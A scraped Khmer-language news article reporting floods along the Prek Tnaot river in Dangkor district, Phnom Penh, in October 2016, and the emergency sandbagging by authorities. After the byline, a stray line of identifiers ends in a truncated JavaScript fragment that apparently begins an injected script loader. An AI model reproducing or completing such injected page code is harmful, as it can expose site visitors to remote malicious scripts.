Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

សង្កាត់ចំនួន ៩ ប្រជាពលចំនួន ១៦៣៧គ្រួសារក្នុងខណ្ឌដង្កោ នៅតាមមាត់ស្ទឹងព្រែកត្នោតកំពុងតែរងគ្រោះដោយ ទឹកជំនន់

ភ្នំពេញ៖ ផ្ទះរបស់ប្រជាពលរដ្ឋ ជាច្រើនខ្នងដែលស្ថិតនៅក្នុងសង្កាត់ចំនួន ៩ ភូមិចំនួន ២៩ ក្នុងខណ្ឌដង្កោ នៅតាមមាត់ស្ទឹងព្រែកត្នោត កំពុងត្រូវបានទឹកជនលិចយ៉ាងខ្លាំង បើគិតមកត្រឹមព្រឹកថ្ងៃទី១៧ រហូតមកដល់ល្ងាចថ្ងៃដដែល ខែតុលា ឆ្នាំ២០១៦នេះ។

អាជ្ញាធរបានធ្វើការប្រកាសអាសន្ន អោយបបងប្អូនប្រជាពលរដ្ឋ ដែលមានលំនៅដ្ឋាន ជាប់មាត់ស្ទឹងនោះ អោយមានការប្រុងន្រយ័ត្នខ្ពស់ នឹងគិតពីសុវត្ថិភាពរបស់ខ្លួនអោយមែនទែន ព្រោះវាបានប្រឈមនិងគ្រោះថ្នាក់ស្ទើគ្រប់វិនាទី។

ខណៈនេះកម្លាំងគណៈបញ្ជាការឯកភាពខណ្ឌដង្កោ បានសហការជាមួយកម្លាំងនគរបាលខណ្ឌ កម្លាំងកងរាជអាវុធហត្ថខណ្ឌ នឹងកម្លាំងសណ្ដាប់ធ្នាប់ខណ្ឌ ព្រមទាំងអាជ្ញាធរសង្កាត់ នានាដែលស្ថិតនៅជាប់មាត់ស្ទឹងនោះ បាននាំគ្នាយកបាវច្រកខ្សាច់ទៅទប់ ទឹកនៅត្រង់ចំណុចស្ពាន៧មករា ឋិតនៅភូមិកំរែង សំពៅ ស្ថិតនៅលើកំណាត់ផ្លូវកៅស៊ូសណ្ដរស្ទឹងព្រែកត្នោត ក្នុងសង្កាត់សាក់សំពៅ ខណ្ឌដង្កោ។
ខណៈនេះទឹកបានឡើងផុតសន្ទះទ្វារទឹក និងបានហូរ យ៉ាងខ្លាំងចូលទៅក្នុងប្រឡាយមេ ដែលជាការគំរាមកំហែងយ៉ាងធ្ងន់ធ្ងរ ដែលអាចទឹកជន់លិចដល់ភូមិជាច្រើននៅក្នុងសង្កាត់ទាំង ៩ ដូចជាសង្កាត់៖ សង្កាត់ក្រាំងពង្រ សង្កាត់សាក់សំពៅ សង្កាត់គងនយ ,សង្កាត់ទៀន សង្កាត់ស្ពានថ្ម សង្កាត់ដង្កោ សង្កាត់ព្រៃសរ សង្កាត់រលួស នឹងសង្កាត់ជើងឯក។
អាជ្ញាធរបានអោយដឹងថា ទឹកស្ទឹងបានចាប់ផ្ដើមឡើងជាបន្តបន្ទាប់ក្រោយពីបុណ្យបិណ្ឌភ្ជុំរួចមក។ គួររំលឹកដែរថានៅក្នុងល្ងាចថ្ងៃដដែលនោះក៍មានការបាក់ទំនប់បឹងសណ្ដរបណ្ដាលអោយទឹកហូរចូលភូមិរបស់បងប្អូនប្រជាពលរដ្ឋកាន់ឆាប់រហ័ស។ ដោយ អាត ចន្ធូ

3f2f754b-187d-4489-a0d4-c26ab6822a61 9d931e72-4816-4832-96ab-0ffedb9df8ed 200574dc-e93d-4468-8a14-076bcf1e608e ddcf70bb-13e6-4228-9583-fb02e6273b12var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More